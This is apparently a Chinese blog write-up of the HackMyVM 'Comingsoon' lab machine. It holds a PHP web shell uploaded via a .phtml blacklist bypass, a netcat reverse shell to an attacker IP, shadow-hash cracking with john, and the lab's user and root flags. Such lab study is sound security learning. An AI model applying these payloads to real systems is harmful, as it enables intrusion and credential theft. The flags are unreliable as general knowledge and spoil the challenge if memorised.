Comingsoon-phtml

刚开始没有IP
单用户修改密码也需要输入用户密码,不能改
/boot/grub/grub.cfg配置文件下

### BEGIN /etc/grub.d/00_header ###
set superusers="root"
password_pbkdf2 root grub.pbkdf2.sha512.10000.ACE3E31954E3E55AB9AB407CA8B6BC9D336B7376733F6B38DB1A2588CE98B6720458284C9C7C5B3AF79BB87046C0770269EF488A0090DF03FA738BCA0FAACD44.3367FD2518DDAC951F14DC7133D015542E0DA317473B41318DA591F20B01FEEBA368C09DA4E079297EDAC83B04445A014984418397306D48A4A5D033BE196B6C

看了wp,才知道root用户密码ToyStory3,进去后也没有dhclient命令获取ip
只能换一种方式,编辑vim /etc/network/interface
Linux(Debian)网卡设置_debian auto eth0-CSDN博客

comingsooneasy前端分析、文件上传绕过、提示信息利用、shadow 爆破、hydra 使用、

主机发现

sudo netdiscover -i eth0 -r 192.168.44.133/24
┌──(kali㉿kali)-[~]
└─$ fping -aqg 192.168.44.0/24

服务探测

sudo nmap -sV -A -T 4 -p- 192.168.44.137

只有22和80

目录爆破

http://192.168.44.137/notes.txt
Dave,

Last few jobs to do...

Set ssh to use keys only (passphrase same as the password)

Just need to sort the images out:
resize and scp them or using the built-in image uploader.

Test the backups and delete anything not needed.

Apply an https certificate.

Cheers,

Webdev

翻译

戴夫,

最后几项工作要做...

将 ssh 设置为仅使用密钥(密码与密码相同)

只需要对图像进行排序:
调整大小并对其进行 scp 或使用内置图像上传器。

测试备份并删除不需要的任何内容。

申请https证书。

干杯,

网络开发者


http://192.168.44.137/index.php
右键检查源码看到提示

 Upload images link if EnableUploader set 
 翻译
 如果设置了 EnableUploader,则上传图像链接

检查当前页面的cookie信息,发现base64编码的东西

RW5hYmxlVXBsb2FkZXIK 
ZmFsc2UK
解码后
EnableUploader
false

综上所述,把false改成true编码后dHJ1ZQ==,就会出现文件上传的入口
http://192.168.44.137/5df03f95b4ff4f4b5dabe53a5a1e15d7.php
burp抓包,这里后端使用黑名单限制了php后缀的上传,尝试使用phtml后缀被解析成功。

POST /5df03f95b4ff4f4b5dabe53a5a1e15d7.php HTTP/1.1
Host: 192.168.44.137
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------30594177056923721121592264423
Content-Length: 379
Origin: http://192.168.44.137
Connection: close
Referer: http://192.168.44.137/5df03f95b4ff4f4b5dabe53a5a1e15d7.php
Cookie: RW5hYmxlVXBsb2FkZXIK=dHJ1ZQ==
Upgrade-Insecure-Requests: 1

-----------------------------30594177056923721121592264423
Content-Disposition: form-data; name="fileToUpload"; filename="1.phtml"
Content-Type: image/png
<?php system($_GET['cmd']);?>
-----------------------------30594177056923721121592264423
Content-Disposition: form-data; name="submit"

Upload Image
-----------------------------30594177056923721121592264423--

命令执行

http://192.168.44.137/assets/img/1.phtml?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data) 

nc反弹shell

http://192.168.44.137/assets/img/1.phtml?cmd=nc -e /bin/sh 192.168.44.128 9001
python3 -c 'import pty;pty.spawn("/bin/bash")'
或者
script /dev/null -c bash
export TERM=xterm
Ctrl+z快捷键
stty raw -echo;fg
reset

提权

目前看啥都没权限
只有/var/backups/目录下有个备份文件backup.tar.gz有用

www-data@comingsoon:/var/backups$ cp backup.tar.gz /tmp
www-data@comingsoon:/tmp$ tar -zxvf backup.tar.gz
www-data@comingsoon:/tmp$ cat etc/shadow
root:$y$j9T$/E0VUDL7uS9RsrvwmGcOH0$LEB/7ERUX9bkm646n3v3RJBxttSVWmTBvs2tUjKe9I6:18976:0:99999:7:::
scpuser:$y$j9T$rVt3bxjp6uYKKYJbYU2Zq0$Ysn02LrCwTUB7iQdRiROO7/WQi8JSGtwLZllR54iX0.:18976:0:99999:7:::

爆破

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ john -w=../rockyou.txt comningsoon --format=crypt 

tigger           (scpuser)  

切换用户

www-data@comingsoon:/home$ su scpuser //tigger

scpuser@comingsoon:~$ cat user.txt
cat user.txt
HMV{user:comingsoon.hmv:58842fc1a7}

查看老密码

scpuser@comingsoon:~$ cat .oldpasswords
cat .oldpasswords
Previous root passwords just incase they are needed for a backup\restore

Incredibles2
Paddington2
BigHero6
101Dalmations

参考这个链接才知道老密码的用处,原来密码是带有数字的动画电影名字:

https://28right.blogspot.com/2021/12/hackmyvm-comingsoon.html
生成单词列表

curl https://www.rottentomatoes.com/top/bestofrt/top_100_animation_movies/|grep ")</a>"|sed 's/[(].*$//'|tr -d ' '> wordlist

应该上面的链接已经失效了,也知道思路了。这里就直接拿别人的密码登录了。

root:ToyStory3
root@comingsoon:~# cat root.txt
cat root.txt
HMV{root:comingsoon.hmv:2339dc81ca}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是乙太呀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值